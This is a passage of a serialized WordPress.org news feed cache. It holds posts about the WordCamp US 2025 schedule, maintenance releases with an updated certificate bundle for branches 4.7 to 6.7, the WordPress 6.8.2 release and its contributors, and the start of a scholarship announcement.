https://i0.wp.com/wordpress.org/news/files/2025/08/ScheduleHeader-scaled.png?resize=768%2C432&amp;ssl=1 768w, https://i0.wp.com/wordpress.org/news/files/2025/08/ScheduleHeader-scaled.png?resize=1536%2C864&amp;ssl=1 1536w, https://i0.wp.com/wordpress.org/news/files/2025/08/ScheduleHeader-scaled.png?resize=2048%2C1152&amp;ssl=1 2048w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" /></figure>\n\n\n\n<p class=\"has-text-align-center\" style=\"padding-top:0;padding-right:0;padding-bottom:0;padding-left:0\"><strong>Check out the full schedule and start planning your WordCamp experience.</strong></p>\n\n\n\n<div class=\"wp-block-buttons is-content-justification-center is-layout-flex wp-container-core-buttons-is-layout-a89b3969 wp-block-buttons-is-layout-flex\">\n<div class=\"wp-block-button is-style-fill\"><a class=\"wp-block-button__link has-blue-1-background-color has-background wp-element-button\" href=\"https://us.wordcamp.org/2025/schedule/\">View The Schedule</a></div>\n</div>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\" />\n\n\n\n<h2 class=\"wp-block-heading\">Contributor Day — Connect, Collaborate, and Give Back</h2>\n\n\n\n<p>Kicking off the week on Tuesday, August 26 is Contributor Day, it is your chance to roll up your sleeves and make a direct impact on WordPress. Whether you’re a seasoned developer, creative designer, translator, marketer, or simply passionate about open source, there’s a place for you to get involved. Join WordPress teams working on real projects, share your skills, and connect with people across the global community. Contributor Day is also a fantastic place for hiring managers or business owners to meet emerging talent and see contributors in action. Lunch is provided, and both in-person and select remote participation options are available. If you’ve ever wanted to help shape the future of WordPress, this is your moment!<br></p>\n\n\n\n<p>Read more: <a href=\"https://us.wordcamp.org/2025/schedule/#contributor-day\">Start planning your Contributor Day activities &gt;&gt;</a></p>\n\n\n\n<h2 class=\"wp-block-heading\">Showcase Day — See WordPress in Action</h2>\n\n\n\n<p>Showcase Day on Wednesday, August 27, shines a spotlight on what&#8217;s possible with WordPress. Get inspired by live demos, case studies, and actionable presentations from experts and innovators using WordPress in creative and impactful ways. You’ll see how changemakers, nonprofits, publishers, and agencies use WordPress to solve real-world problems, build new products, and drive the web forward. Highlights include hands-on workshops, technical talks, and practical sessions covering everything from design systems to modern AI. It’s a full day dedicated to celebrating the talent, creativity, and innovation of the WordPress community.</p>\n\n\n\n<p>Read more: <a href=\"https://us.wordcamp.org/2025/schedule/#showcase-day\">See where these inspirational showcases take you &gt;&gt;</a></p>\n\n\n\n<h2 class=\"wp-block-heading\">Conference Days — Learn, Connect, and Level Up</h2>\n\n\n\n<p>The main event days for Thursday and Friday, August 28-29, feature a robust mix of technical deep-dives, product masterclasses, and sessions designed for all experience levels. Whether you’re a developer, designer, business owner, or just starting out, you’ll find plenty to explore—from future-focused discussions on AI and performance to hands-on workshops and networking events that bring the community together.</p>\n\n\n\n<p><strong>Keynote Highlights:</strong></p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Amy Sample Ward, CEO of NTEN:</strong> The Tech That Comes Next: How Changemakers, Philanthropists, and Technologists Can Build an Equitable World. Featured Wednesday, August 27.</li>\n\n\n\n<li><strong>Danny Sullivan, from Google Search</strong>: Industry leader, featured Thursday, August 28.</li>\n\n\n\n<li><strong>Matt Mullenweg, Co-founder of WordPress:</strong> Featured Friday, August 29.</li>\n\n\n\n<li>More keynotes announcing soon!</li>\n</ul>\n\n\n\n<p>With dozens of sessions across multiple tracks, plus workshops and networking opportunities, WordCamp US is set to be an unforgettable experience. Don’t miss your chance to connect, share ideas, and help shape the future of the web.</p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\" />\n\n\n\n<p class=\"has-text-align-center\"><strong>Check out the full schedule and start planning your WordCamp experience.</strong></p>\n\n\n\n<div class=\"wp-block-buttons is-content-justification-center is-layout-flex wp-container-core-buttons-is-layout-a89b3969 wp-block-buttons-is-layout-flex\">\n<div class=\"wp-block-button is-style-fill\"><a class=\"wp-block-button__link has-blue-1-background-color has-background wp-element-button\" href=\"https://us.wordcamp.org/2025/schedule/\">View The Schedule</a></div>\n</div>\n\n\n\n<p></p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:30:\"com-wordpress:feed-additions:1\";a:1:{s:7:\"post-id\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"19004\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:2;a:6:{s:4:\"data\";s:63:\"\n		\n		\n		\n		\n		\n				\n		\n		\n		\n\n					\n										\n					\n		\n		\n			\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:6:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:54:\"Maintenance Releases for WordPress branches 4.7 to 6.7\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:90:\"https://wordpress.org/news/2025/08/maintenance-releases-for-wordpress-branches-4-7-to-6-7/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 05 Aug 2025 19:11:05 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:3:{i:0;a:5:{s:4:\"data\";s:7:\"General\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:14:\"minor-releases\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:2;a:5:{s:4:\"data\";s:8:\"releases\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"https://wordpress.org/news/?p=18997\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:374:\"Following on from the WordPress 6.8.2 maintenance release last month, the included update to the root security certificate bundle has been backported to all branches back to 4.7. This ensures that when your site performs server-side HTTP requests, the most up-to-date information about trusted security certificates is used. Further information can be found on the [&#8230;]\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:15:\"John Blackbourn\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:2119:\"\n<p>Following on from <a href=\"https://wordpress.org/news/2025/07/wordpress-6-8-2-maintenance-release/\">the WordPress 6.8.2 maintenance release last month</a>, the included update to the root security certificate bundle has been backported to all branches back to 4.7. This ensures that when your site performs server-side HTTP requests, the most up-to-date information about trusted security certificates is used. Further information can be found on <a href=\"https://core.trac.wordpress.org/ticket/62811\">the Core Trac ticket</a>.</p>\n\n\n\n<p>A new maintenance release for each branch from 4.7 to 6.7 is now available. If you have sites on these branches and they support automatic background updates, the update process will begin automatically.</p>\n\n\n\n<p>The latest and only supported version of WordPress remains as 6.8.2. This is being done as a courtesy for sites still running older versions of WordPress. You can <a href=\"https://wordpress.org/wordpress-6.8.2.zip\">download WordPress 6.8.2 from WordPress.org</a>, or visit your WordPress Dashboard, click “Updates”, and then click “Update Now”.</p>\n\n\n\n<h2 class=\"wp-block-heading\">Thank you to these WordPress contributors</h2>\n\n\n\n<p>Special thanks to <a href=\'https://profiles.wordpress.org/desrosj/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>desrosj</a>, <a href=\'https://profiles.wordpress.org/ocean90/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>ocean90</a>, <a href=\'https://profiles.wordpress.org/davidbaumwald/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>davidbaumwald</a>, <a href=\'https://profiles.wordpress.org/peterwilsoncc/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>peterwilsoncc</a>, <a href=\'https://profiles.wordpress.org/jorbin/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>jorbin</a>, <a href=\'https://profiles.wordpress.org/estelaris/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>estelaris</a>, and <a href=\'https://profiles.wordpress.org/johnbillion/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>johnbillion</a> for backporting and releasing this update.</p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:30:\"com-wordpress:feed-additions:1\";a:1:{s:7:\"post-id\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"18997\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:3;a:6:{s:4:\"data\";s:63:\"\n		\n		\n		\n		\n		\n				\n		\n		\n		\n\n					\n										\n					\n		\n		\n			\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:6:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"WordPress 6.8.2 Maintenance Release\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:71:\"https://wordpress.org/news/2025/07/wordpress-6-8-2-maintenance-release/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 15 Jul 2025 15:41:50 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:3:{i:0;a:5:{s:4:\"data\";s:8:\"Releases\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:14:\"minor-releases\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:2;a:5:{s:4:\"data\";s:8:\"releases\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"https://wordpress.org/news/?p=18903\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:357:\"WordPress 6.8.2 is now available! This minor release includes fixes for 20 Core tickets and 15 Block Editor issues. For a full list of bug fixes, please refer to the release candidate announcement. WordPress 6.8.2 is a short-cycle maintenance release. More maintenance releases may be made available throughout 2025. If you have sites that support [&#8230;]\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:9:\"Jb Audras\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:10720:\"\n<h2 class=\"wp-block-heading\">WordPress 6.8.2 is now available!</h2>\n\n\n\n<p>This minor release includes fixes for <a href=\"https://core.trac.wordpress.org/query?resolution=fixed&amp;milestone=6.8.2&amp;group=component&amp;col=id&amp;col=summary&amp;col=milestone&amp;col=owner&amp;col=type&amp;col=status&amp;col=priority&amp;order=priority\">20 Core tickets</a> and <a href=\"https://github.com/WordPress/gutenberg/pull/70557\">15 Block Editor issues</a>. For a full list of bug fixes, please refer to the <a href=\"https://make.wordpress.org/core/2025/07/08/wordpress-6-8-2-rc1-is-now-available/\">release candidate announcement.</a></p>\n\n\n\n<p>WordPress 6.8.2 is a short-cycle maintenance release. More maintenance releases may be made available throughout 2025.</p>\n\n\n\n<p>If you have sites that support automatic background updates, the update process will begin automatically.</p>\n\n\n\n<p>You can <a href=\"https://wordpress.org/wordpress-6.8.2.zip\">download WordPress 6.8.2 from WordPress.org</a>, or visit your WordPress Dashboard, click “Updates”, and then click “Update Now”. For more information on this release, please <a href=\"https://wordpress.org/support/wordpress-version/version-6-8-2\">visit the HelpHub version page</a>.</p>\n\n\n\n<h2 class=\"wp-block-heading\">Dropping security updates for WordPress versions 4.1 through 4.6</h2>\n\n\n\n<p>This is not directly related to the 6.8.2 maintenance release, but <a href=\"https://wordpress.org/news/2025/06/dropping-security-updates-for-wordpress-versions-4-1-through-4-6/\">branches 4.1 to 4.6 had their final release today</a>. These branches won&#8217;t receive any security update anymore.</p>\n\n\n\n<h2 class=\"wp-block-heading\">Thank you to these WordPress contributors</h2>\n\n\n\n<p>WordPress 6.8.2 was led by <a href=\"https://profiles.wordpress.org/audrasjb/\">Jb Audras</a>,&nbsp;<a href=\"https://profiles.wordpress.org/estelaris/\">Estela Rueda</a>&nbsp;and&nbsp;<a href=\"https://profiles.wordpress.org/zunaid321/\">Zunaid Amin</a>.</p>\n\n\n\n<p>Special thanks to <a href=\'https://profiles.wordpress.org/davidbaumwald/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>davidbaumwald</a>, <a href=\'https://profiles.wordpress.org/sergeybiryukov/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>sergeybiryukov</a>, <a href=\'https://profiles.wordpress.org/mamaduka/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>mamaduka</a>, <a href=\'https://profiles.wordpress.org/wildworks/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>wildworks</a> and <a href=\'https://profiles.wordpress.org/jorbin/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>jorbin</a> for their help on specific release tasks.</p>\n\n\n\n<p>WordPress 6.8.2 would not have been possible without the contributions of the following 96 people. Their asynchronous coordination to deliver maintenance fixes into a stable release is a testament to the power and capability of the WordPress community.</p>\n\n\n\n<p class=\"is-style-wporg-props-medium has-white-color has-midnight-gradient-background has-text-color has-background has-link-color has-normal-font-size wp-elements-2ad7deb15a87fd29427f001e4c18a1ac\"><a href=\"https://profiles.wordpress.org/jorbin\">Aaron Jorbin</a>, <a href=\"https://profiles.wordpress.org/adamsilverstein\">Adam Silverstein</a>, <a href=\"https://profiles.wordpress.org/zieladam\">Adam Zieliński</a>, <a href=\"https://profiles.wordpress.org/wildworks\">Aki Hamano</a>, <a href=\"https://profiles.wordpress.org/alexstine\">Alex Stine</a>, <a href=\"https://profiles.wordpress.org/anatolbroder\">Anatol Broder</a>, <a href=\"https://profiles.wordpress.org/afercia\">Andrea Fercia</a>, <a href=\"https://profiles.wordpress.org/nacin\">Andrew Nacin</a>, <a href=\"https://profiles.wordpress.org/ankitkumarshah\">Ankit Kumar Shah</a>, <a href=\"https://profiles.wordpress.org/annezazu\">annezazu</a>, <a href=\"https://profiles.wordpress.org/azharderaiya\">Azhar Deraiya</a>, <a href=\"https://profiles.wordpress.org/benjamingosset\">Benjamin Gosset</a>, <a href=\"https://profiles.wordpress.org/bhubbard\">Brandon Hubbard</a>, <a href=\"https://profiles.wordpress.org/kraftbj\">Brandon Kraft</a>, <a href=\"https://profiles.wordpress.org/brhodes\">brhodes</a>, <a href=\"https://profiles.wordpress.org/poena\">Carolina Nymark</a>, <a href=\"https://profiles.wordpress.org/czarate\">Chris Zarate</a>, <a href=\"https://profiles.wordpress.org/courane01\">Courtney Robertson</a>, <a href=\"https://profiles.wordpress.org/talldanwp\">Daniel Richards</a>, <a href=\"https://profiles.wordpress.org/darshitrajyaguru97\">Darshit Rajyaguru</a>, <a href=\"https://profiles.wordpress.org/davidbaumwald\">David Baumwald</a>, <a href=\"https://profiles.wordpress.org/dmsnell\">Dennis Snell</a>, <a href=\"https://profiles.wordpress.org/dhruvang21\">Dhruvang21</a>, <a href=\"https://profiles.wordpress.org/dilipbheda\">Dilip Bheda</a>, <a href=\"https://profiles.wordpress.org/dd32\">Dion Hulse</a>, <a href=\"https://profiles.wordpress.org/divinenephron\">divinenephron</a>, <a href=\"https://profiles.wordpress.org/dustintechsmith\">dustintechsmith</a>, <a href=\"https://profiles.wordpress.org/ericlewis\">Eric Andrew Lewis</a>, <a href=\"https://profiles.wordpress.org/im3dabasia1\">Eshaan Dabasiya</a>, <a href=\"https://profiles.wordpress.org/estelaris\">Estela Rueda</a>, <a href=\"https://profiles.wordpress.org/eherman24\">Evan Herman</a>, <a href=\"https://profiles.wordpress.org/fabiankaegy\">Fabian Kägy</a>, <a href=\"https://profiles.wordpress.org/faisalahammad\">Faisal Ahammad</a>, <a href=\"https://profiles.wordpress.org/flixos90\">Felix Arntz</a>, <a href=\"https://profiles.wordpress.org/pento\">Gary Pendergast</a>, <a href=\"https://profiles.wordpress.org/guddu1315\">Gaurang Dabhi</a>, <a href=\"https://profiles.wordpress.org/mamaduka\">George Mamadashvili</a>, <a href=\"https://profiles.wordpress.org/gernberg\">gernberg</a>, <a href=\"https://profiles.wordpress.org/gziolo\">Greg Ziółkowski</a>, <a href=\"https://profiles.wordpress.org/harshgajipara\">Harsh Gajipara</a>, <a href=\"https://profiles.wordpress.org/helgatheviking\">HelgaTheViking</a>, <a href=\"https://profiles.wordpress.org/abcd95\">Himanshu Pathak</a>, <a href=\"https://profiles.wordpress.org/audrasjb\">Jb Audras</a>, <a href=\"https://profiles.wordpress.org/JeffPaul\">Jeffrey Paul</a>, <a href=\"https://profiles.wordpress.org/jdy68\">Jenny Dupuy</a>, <a href=\"https://profiles.wordpress.org/luminuu\">Jessica Lyschik</a>, <a href=\"https://profiles.wordpress.org/jigarpanchal\">Jigar Panchal</a>, <a href=\"https://profiles.wordpress.org/joedolson\">Joe Dolson</a>, <a href=\"https://profiles.wordpress.org/joemcgill\">Joe McGill</a>, <a href=\"https://profiles.wordpress.org/johnbillion\">John Blackbourn</a>, <a href=\"https://profiles.wordpress.org/mindctrl\">John Parris</a>, <a href=\"https://profiles.wordpress.org/jonsurrell\">Jon Surrell</a>, <a href=\"https://profiles.wordpress.org/desrosj\">Jonathan Desrosiers</a>, <a href=\"https://profiles.wordpress.org/spacedmonkey\">Jonny Harris</a>, <a href=\"https://profiles.wordpress.org/kausaralm\">Kausar Alam</a>, <a href=\"https://profiles.wordpress.org/kishanjasani\">Kishan Jasani</a>, <a href=\"https://profiles.wordpress.org/tyxla\">Marin Atanasov</a>, <a href=\"https://profiles.wordpress.org/matt\">Matt Mullenweg</a>, <a href=\"https://profiles.wordpress.org/pfefferle\">Matthias Pfefferle</a>, <a href=\"https://profiles.wordpress.org/megane9988\">megane9988</a>, <a href=\"https://profiles.wordpress.org/mosescursor\">Moses Cursor Ssebunya</a>, <a href=\"https://profiles.wordpress.org/mukesh27\">Mukesh Panchal</a>, <a href=\"https://profiles.wordpress.org/mwillman1991\">mwillman1991</a>, <a href=\"https://profiles.wordpress.org/bugnumber9\">Nazar Hotsa</a>, <a href=\"https://profiles.wordpress.org/nidhidhandhukiya\">nidhidhandhukiya</a>, <a href=\"https://profiles.wordpress.org/nikunj8866\">Nikunj Hatkar</a>, <a href=\"https://profiles.wordpress.org/oferlaor\">oferlaor</a>, <a href=\"https://profiles.wordpress.org/oglekler\">Olga Gleckler</a>, <a href=\"https://profiles.wordpress.org/swissspidy\">Pascal Birchler</a>, <a href=\"https://profiles.wordpress.org/paulstanos\">paulstanos</a>, <a href=\"https://profiles.wordpress.org/peterwilsoncc\">Peter Wilson</a>, <a href=\"https://profiles.wordpress.org/puggan\">puggan</a>, <a href=\"https://profiles.wordpress.org/ravigadhiyawp\">Ravi Gadhiya</a>, <a href=\"https://profiles.wordpress.org/youknowriad\">Riad Benguella</a>, <a href=\"https://profiles.wordpress.org/rollybueno\">Rolly Bueno</a>, <a href=\"https://profiles.wordpress.org/room34\">room34</a>, <a href=\"https://profiles.wordpress.org/sainathpoojary\">Sainath Poojary</a>, <a href=\"https://profiles.wordpress.org/sajjad67\">Sajjad Hossain Sagor</a>, <a href=\"https://profiles.wordpress.org/Sam_a\">sam_a</a>, <a href=\"https://profiles.wordpress.org/sandeepdahiya\">Sandeep Dahiya</a>, <a href=\"https://profiles.wordpress.org/SergeyBiryukov\">Sergey Biryukov</a>, <a href=\"https://profiles.wordpress.org/shanemuir\">Shane Muirhead</a>, <a href=\"https://profiles.wordpress.org/siliconforks\">siliconforks</a>, <a href=\"https://profiles.wordpress.org/sirlouen\">SirLouen</a>, <a href=\"https://profiles.wordpress.org/sabernhardt\">Stephen Bernhardt</a>, <a href=\"https://profiles.wordpress.org/sukhendu2002\">Sukhendu Sekhar Guria</a>, <a href=\"https://profiles.wordpress.org/karmatosed\">Tammie Lister</a>, <a href=\"https://profiles.wordpress.org/TobiasBg\">Tobias Bäthge</a>, <a href=\"https://profiles.wordpress.org/wpsmith\">Travis Smith</a>, <a href=\"https://profiles.wordpress.org/ugyensupport\">Ugyen Dorji</a>, <a href=\"https://profiles.wordpress.org/uxl\">uxl</a>, <a href=\"https://profiles.wordpress.org/westonruter\">Weston Ruter</a>, <a href=\"https://profiles.wordpress.org/whaze\">whaze</a>, <a href=\"https://profiles.wordpress.org/getsyash\">Yash B</a>, <a href=\"https://profiles.wordpress.org/yogeshbhutkar\">Yogesh Bhutkar</a>, and <a href=\"https://profiles.wordpress.org/zunaid321\">Zunaid Amin</a></p>\n\n\n\n<h2 class=\"wp-block-heading\">How to contribute</h2>\n\n\n\n<p>To get involved in WordPress core development, head over to Trac, <a href=\"https://core.trac.wordpress.org/report/6\">pick a ticket</a>, and join the conversation on Slack, in the <a href=\"https://wordpress.slack.com/archives/C02RQBWTW\">#core</a> and <a href=\"https://wordpress.slack.com/archives/C080HLPP2Q6\">#6-8-release-leads</a> channels. Need help? Check out the <a href=\"https://make.wordpress.org/core/handbook/\">Core Contributor Handbook</a>.</p>\n\n\n\n<p class=\"has-text-align-right\"><em>Thanks to <a href=\'https://profiles.wordpress.org/estelaris/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>estelaris</a> and <a href=\'https://profiles.wordpress.org/zunaid321/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>zunaid321</a> for proofreading.</em></p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:30:\"com-wordpress:feed-additions:1\";a:1:{s:7:\"post-id\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"18903\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:4;a:6:{s:4:\"data\";s:60:\"\n		\n		\n		\n		\n		\n				\n		\n		\n\n					\n										\n					\n		\n		\n			\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:6:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:71:\"Celebrating Kim Parsell: 2025 WordCamp US Scholarship Applications Open\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:87:\"https://wordpress.org/news/2025/07/kim-parsell-2025-wcus-scholarship-applications-open/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 14 Jul 2025 18:57:47 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:2:{i:0;a:5:{s:4:\"data\";s:9:\"Community\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:8:\"WordCamp\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"https://wordpress.org/news/?p=18911\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:364:\"The WordPress Foundation is pleased to announce the return of the Kim Parsell Memorial Scholarship for WordCamp US 2025. Applications are being accepted until July 25, 2025. Remembering Kim Parsell Kim Parsell was a dedicated contributor and a beloved member of the WordPress community. Her passion for open source and her welcoming spirit inspired many, [&#8230;]\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Brett McSherry\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:6224:\"\n<p>The WordPress Foundation is pleased to announce the return of the <strong>Kim Parsell Memorial Scholarship</strong> for WordCamp US 2025. Applications are being accepted until <strong>July 25, 2025</strong>.</p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full has-custom-border\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"604\" height=\"370\" src=\"https://i0.wp.com/wordpress.org/news/files/2025/07/wpdocs-team-1.webp?resize=604%2C370&#038;ssl=1\" alt=\"\" class=\"wp-image-18912\" style=\"border-width:25px;border-radius:40px\" srcset=\"https://i0.wp.com/wordpress.org/news/files/2025/07/wpdocs-team-1.webp?w=604&amp;ssl=1 604w, https://i0.wp.com/wordpress.org/news/files/2025/07/wpdocs-team-1.webp?resize=300%2C184&amp;ssl=1 300w\" sizes=\"auto, (max-width: 604px) 100vw, 604px\" /></figure>\n\n\n\n<div class=\"wp-block-group has-off-white-2-background-color has-background is-layout-constrained wp-container-core-group-is-layout-6cbf45de wp-block-group-is-layout-constrained\" style=\"margin-top:48px;margin-bottom:48px;padding-top:24px;padding-bottom:24px\">\n<div class=\"wp-block-columns is-not-stacked-on-mobile is-layout-flex wp-container-core-columns-is-layout-28f84493 wp-block-columns-is-layout-flex\">\n<div class=\"wp-block-column is-layout-flow wp-block-column-is-layout-flow\" style=\"flex-basis:2%\"></div>\n\n\n\n<div class=\"wp-block-column is-layout-flow wp-block-column-is-layout-flow\" style=\"flex-basis:96%\">\n<h2 class=\"wp-block-heading\">Remembering Kim Parsell</h2>\n\n\n\n<div class=\"wp-block-columns is-layout-flex wp-container-core-columns-is-layout-28f84493 wp-block-columns-is-layout-flex\">\n<div class=\"wp-block-column is-layout-flow wp-block-column-is-layout-flow\" style=\"flex-basis:40%\">\n<figure class=\"wp-block-image size-full\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"400\" height=\"400\" src=\"https://i0.wp.com/wordpress.org/news/files/2025/07/Kim-parsell-twitter-image-2.jpeg?resize=400%2C400&#038;ssl=1\" 